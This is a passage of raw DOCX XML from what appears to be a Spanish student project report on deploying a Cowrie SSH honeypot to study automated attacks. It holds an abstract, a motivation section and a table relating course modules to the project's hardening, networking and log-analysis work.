        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Abstract</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This project covers the deployment and analysis of a medium-interaction SSH honeypot based on Cowrie, exposed to the Internet from a Hetzner Cloud server. The system simulates a vulnerable Linux server to attract automated attacks —primarily brute-force login attempts, command execution, and malware downloads— with the goal of studying the tactics, techniques, and procedures (TTPs) used by attackers. Data captured over a minimum three-week period is processed by a purpose-built Python script that generates attacker IP rankings with geolocation, most-used credentials, executed commands, and downloaded files. Findings are mapped to the MITRE ATT&amp;CK framework and accompanied by defensive recommendations applicable to production environments. Optionally, logs are ingested into Wazuh (SIEM) for dashboard visualization. The project demonstrates how a low-cost honeypot provides actionable threat intelligence using exclusively open-source tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Keywords: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">honeypot, SSH, Cowrie, threat intelligence, MITRE ATT&amp;CK, cybersecurity, brute force, malware, SIEM, cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Justificación del Proyecto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Motivación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La ciberseguridad se ha convertido en una disciplina esencial dentro de la administración de sistemas informáticos en red. Según el informe del Centro Criptológico Nacional (CCN-CERT), España registró más de 100.000 incidentes gestionados en 2024, con un crecimiento sostenido de los ataques automatizados contra servicios expuestos a Internet. Esta tendencia se acentúa en un contexto global donde la transformación digital ha incrementado exponencialmente la superficie de ataque de organizaciones de todos los tamaños.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El protocolo SSH (Secure Shell), presente en prácticamente todo servidor Linux y en muchos dispositivos de red, constituye uno de los vectores más atacados. Cualquier máquina con el puerto 22 abierto a Internet recibe intentos de fuerza bruta en cuestión de minutos tras su puesta en marcha. Estos ataques, ejecutados mayoritariamente por botnets, prueban combinaciones de credenciales comunes de forma masiva y automatizada, buscando servidores mal configurados que permitan el acceso con contraseñas débiles o por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Este proyecto nace de la voluntad de comprender de primera mano cómo operan estos ataques automatizados: qué credenciales prueban, con qué frecuencia y desde qué regiones geográficas; qué comandos ejecutan tras obtener acceso; y qué malware intentan desplegar en los sistemas comprometidos. Un honeypot permite observar todo esto en un entorno controlado y sin riesgo para infraestructura de producción, proporcionando datos reales que pueden utilizarse para mejorar las defensas de cualquier organización.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Desde una perspectiva formativa, el proyecto integra competencias de la mayoría de los módulos del ciclo, como se detalla en el apartado siguiente. Esta transversalidad lo convierte en un proyecto idóneo como Proyecto Intermodular.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Relación con los Módulos Profesionales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La Tabla 1 recoge los módulos del ciclo de ASIR que intervienen en el proyecto y, para cada uno, el trabajo concreto en el que se aplican sus contenidos. Se indica también el grado de relación, para distinguir los módulos en los que se apoya el núcleo del proyecto de aquellos con una aportación puntual.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143"/>
        <w:gridCol w:w="4604"/>
        <w:gridCol w:w="1191"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Módulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Aplicación en el proyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Relación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Seguridad y Alta Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Bastionado del SSH (puerto 2022, solo clave, sin root), cortafuegos en dos capas (Cloud Firewall e iptables), confinamiento del servicio con systemd, honeypot como técnica de detección y análisis de ataques con MITRE ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Administración de Sistemas Operativos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gestión de usuarios y permisos (usuario administrador y usuario sin privilegios para Cowrie), servicios con systemd, scripts de administración en Bash, actualizaciones automáticas y diagnóstico con journalctl.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Servicios de Red e Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configuración del servicio SSH (sshd_config, activación por socket en Ubuntu 24.04), autenticación por clave y transferencia de ficheros con scp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Planificación y Administración de Redes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Direccionamiento IP público, redirección de puertos con NAT (PREROUTING), filtrado de tráfico y verificación con nmap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Implantación de Sistemas Operativos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Despliegue de Ubuntu Server 24.04 en la nube, elección de imagen y arquitectura, entornos virtuales de Python y laboratorio en VirtualBox.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lenguajes de Marcas y Sistemas de Gestión de Información</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Procesamiento de los logs en formato JSON, exportación a CSV y diagramas del proyecto elaborados en HTML y SVG.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fundamentos de Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dimensionado del servidor (vCPU, memoria y disco) y diferencias entre arquitecturas x86 y ARM, que reaparecen en el malware capturado, compilado para cinco arquitecturas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Implantación de Aplicaciones Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Consumo de la API REST de geolocalización y del servicio de notificaciones; publicación del proyecto en un repositorio Git.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gestión de Bases de Datos / Administración de SGBD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin relación directa: los eventos se almacenan en ficheros JSON. La integración con el SIEM Wazuh, que indexa los eventos, se plantea como trabajo futuro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indirecta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1350"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Inglés Profesional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
